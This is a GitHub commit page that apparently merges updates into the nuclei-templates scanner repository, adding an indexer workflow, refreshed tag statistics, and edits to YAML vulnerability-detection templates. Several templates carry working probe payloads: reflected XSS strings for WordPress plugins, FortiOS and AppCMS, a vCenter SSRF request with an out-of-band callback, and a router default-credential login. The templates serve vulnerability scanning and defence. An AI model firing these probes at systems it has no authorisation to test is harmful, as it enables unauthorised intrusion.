Merge pull request #1 from projectdiscovery/master

Update
patch-1
Dhiyaneshwaran 2022-01-29 21:10:01 +05:30 committed by GitHub
commit 3b5e9039d4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
56 changed files with 3166 additions and 2656 deletions

View File

@ -0,0 +1,30 @@
name: 📑 Template-DB Indexer
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Intalling Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 | | cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 | | lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 | | panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 | | xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | | | wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | | | exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | | | rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | | | tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | | | cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | | | wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
**203 directories, 3004 files**. **212 directories, 3054 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 | | cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 | | lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 | | panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 | | xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | | | wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | | | exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | | | rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | | | tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | | | cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | | | wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |

View File

@ -4,9 +4,14 @@ info:
name: Xiuno BBS CNVD-2019-01348 name: Xiuno BBS CNVD-2019-01348
author: princechaddha author: princechaddha
severity: medium severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019 tags: xiuno,cnvd,cnvd2019
remediation: There is currently no patch available.
classification:
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 6.5
cwe-id: CWE-276
requests: requests:
- method: GET - method: GET
@ -27,3 +32,5 @@ requests:
- "/view/js/xiuno.js" - "/view/js/xiuno.js"
- "Choose Language (选择语言)" - "Choose Language (选择语言)"
condition: and condition: and
# Enhanced by mp on 2022/01/26

View File

@ -643,7 +643,7 @@
"author": "forgedhallpass", "author": "forgedhallpass",
"links": { "links": {
"github": "https://www.github.com/forgedhallpass", "github": "https://www.github.com/forgedhallpass",
"twitter": "", "twitter": "https://twitter.com/forgedhallpass",
"linkedin": "", "linkedin": "",
"website": "", "website": "",
"email": "" "email": ""

View File

@ -5,10 +5,13 @@ info:
author: r3naissance author: r3naissance
severity: low severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
remediation: Upgrade to the latest version.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897 - https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft tags: cve,cve2000,frontpage,microsoft
classification:
cve-id: CVE-2000-0114
requests: requests:
- method: GET - method: GET
@ -25,3 +28,6 @@ requests:
part: body part: body
words: words:
- "_vti_bin/shtml.dll" - "_vti_bin/shtml.dll"
# Enhanced by mp on 2022/01/27

View File

@ -4,9 +4,14 @@ info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk author: dhiyaneshDk
severity: medium severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php." description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
reference: https://www.exploit-db.com/exploits/24068 remediation: Upgrade to the latest version.
reference:
- https://www.exploit-db.com/exploits/24068
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
tags: xss,squirrelmail,cve2004,cve tags: xss,squirrelmail,cve2004,cve
classification:
cve-id: CVE-2004-0519
requests: requests:
- method: GET - method: GET
@ -28,3 +33,7 @@ requests:
part: header part: header
words: words:
- "text/html" - "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27

View File

@ -4,11 +4,14 @@ info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
remediation: Upgrade to the latest version.
reference: reference:
- https://www.exploit-db.com/exploits/6817 - https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172 - https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi tags: cve,cve2008,joomla,lfi
classification:
cve-id: CVE-2008-6172
requests: requests:
- method: GET - method: GET
@ -25,3 +28,5 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/01/27

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" - "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -3,7 +3,7 @@ info:
author: Random_Robbie author: Random_Robbie
name: Apache Struts2 RCE name: Apache Struts2 RCE
severity: critical severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce,apache tags: cve,cve2017,struts,rce,apache
reference: https://github.com/mazen160/struts-pwn reference: https://github.com/mazen160/struts-pwn
classification: classification:

View File

@ -1,7 +1,7 @@
id: CVE-2017-7391 id: CVE-2017-7391
info: info:
name: Magmi Cross-Site Scripting v.0.7.22 name: Magmi Cross-Site Scripting v.0.7.22
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
@ -25,12 +25,13 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
- type: word
words:
- '"><script>alert(document.domain);</script><'
part: body
- type: word - type: word
part: body
words:
- '"><script>alert(document.domain);</script><'
- type: word
part: header
words: words:
- "text/html" - "text/html"
part: header

View File

@ -4,7 +4,7 @@ info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated) name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741 author: gy741
severity: critical severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
reference: reference:
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247

View File

@ -4,7 +4,7 @@ info:
name: D-Link Routers - Directory Traversal name: D-Link Routers - Directory Traversal
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
reference: reference:
- https://www.exploit-db.com/exploits/45678 - https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822

View File

@ -10,7 +10,7 @@ info:
caused by improper neutralization of special elements. caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack. or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce,spring tags: cve,cve2018,vmware,rce,spring
classification: classification:

View File

@ -2,34 +2,38 @@ id: CVE-2018-13380
info: info:
name: Fortinet FortiOS Cross-Site Scripting name: Fortinet FortiOS Cross-Site Scripting
author: shelld3v author: shelld3v,AaronChen0
severity: medium severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 reference:
tags: cve,cve2018,fortios,xss,fortinet - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10 cvss-score: 6.10
cve-id: CVE-2018-13380 cve-id: CVE-2018-13380
cwe-id: CWE-79 cwe-id: CWE-79
tags: cve,cve2018,fortios,xss,fortinet
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E" - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E" - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "<svg/onload=alert(1337)>" - "<svg/onload=alert(1337)>"
part: body - "<script>alert(1337)</script>"
condition: or
- type: word - type: word
part: header
words: words:
- "application/json" - "application/json"
part: header
negative: true negative: true
- type: status - type: status

View File

@ -4,7 +4,7 @@ info:
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins author: Ganofins
severity: critical severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server. description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin,rce,upload tags: cve,cve2020,wordpress,wp-plugin,rce,upload
classification: classification:

View File

@ -4,7 +4,7 @@ info:
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
author: gy741 author: gy741
severity: high severity: high
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
reference: reference:
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
tags: cve,cve2020,cacti,rce,oast tags: cve,cve2020,cacti,rce,oast

View File

@ -0,0 +1,38 @@
id: CVE-2021-21973
info:
name: VMware vCenter Unauthenticated SSRF
author: pdteam
severity: medium
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
- https://twitter.com/osama_hroot/status/1365586206982082560
- https://twitter.com/bytehx343/status/1486582542807420928
tags: cve,cve2021,vmware,ssrf,vcenter,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-21973
cwe-id: CWE-918
requests:
- raw:
- |
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
Host: {{Hostname}}
Vcip: {{interactsh-url}}
Vcpassword: {{rand_base(6)}}
Vcusername: {{rand_base(6)}}
Reqresource: {{rand_base(6)}}
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "The server sent HTTP status code 200"

View File

@ -4,7 +4,7 @@ info:
author: dhiyaneshDk,philippedelteil author: dhiyaneshDk,philippedelteil
severity: critical severity: critical
name: Confluence Server OGNL injection - RCE name: Confluence Server OGNL injection - RCE
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if Allow people to sign up to create their account is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
tags: cve,cve2021,rce,confluence,injection,ognl tags: cve,cve2021,rce,confluence,injection,ognl
reference: reference:
- https://jira.atlassian.com/browse/CONFSERVER-67940 - https://jira.atlassian.com/browse/CONFSERVER-67940

View File

@ -0,0 +1,47 @@
id: CVE-2021-32682
info:
name: elFinder - Multiple vulnerabilities leading to RCE
author: smaranchand
severity: critical
tags: cve,cve2021,elfinder,misconfig,rce,oss
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
reference:
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
remediation: Update to elFinder 2.1.59
metadata:
github: https://github.com/Studio-42/elFinder
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-32682
cwe-id: CWE-22,CWE-78,CWE-918
requests:
- method: GET
path:
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
- "{{BaseURL}}/assets/elFinder/elfinder.html"
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "elfinder"
- "php/connector"
condition: and
- type: status
status:
- 200

View File

@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30 cvss-score: 5.30
cve-id: CVE-2021-38314 cve-id: CVE-2021-38314
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of sites `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
requests: requests:
- raw: - raw:

View File

@ -1,7 +1,7 @@
id: CVE-2021-40960 id: CVE-2021-40960
info: info:
name: Galera WebTemplate 1.0 Directory Traversal name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo author: daffainfo
severity: critical severity: critical
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.

View File

@ -0,0 +1,38 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
tags: cve,cve2021,appcms,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-45380
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '""></script><script>alert(document.domain)</script>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS) name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
author: hexcat author: hexcat
severity: high severity: high
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218). description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
reference: reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/ - https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/ - https://wordpress.org/plugins/wp-html-mail/

View File

@ -0,0 +1,33 @@
id: CVE-2022-23944
info:
name: ShenYu Admin Unauth Access
author: cckuakilong
severity: medium
description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
reference:
- https://github.com/apache/incubator-shenyu/pull/2462/files
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
classification:
cve-id: CVE-2022-23944
cwe-id: CWE-862
tags: cve,cve2022,shenyu,unauth,apache
requests:
- method: GET
path:
- "{{BaseURL}}/plugin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"message":"query success"'
- '"code":200'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: mofi4500-default-login
info:
name: MOFI4500-4GXeLTE-V2 Default Login
author: pikpikcu
severity: critical
tags: mofi,default-login
requests:
- raw:
- |
POST /cgi-bin/luci/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=root&password=admin
attack: pitchfork
payloads:
username:
- root
password:
- admin
matchers-condition: and
matchers:
- type: word
words:
- "MOFI4500 - General - LuCI"
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: netdata-dashboard-detect
info:
name: NetData Dashboard Detect
author: pussycat0x
severity: info
metadata:
shodan-dork: 'Server: NetData Embedded HTTP Server'
tags: netdata,panel,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
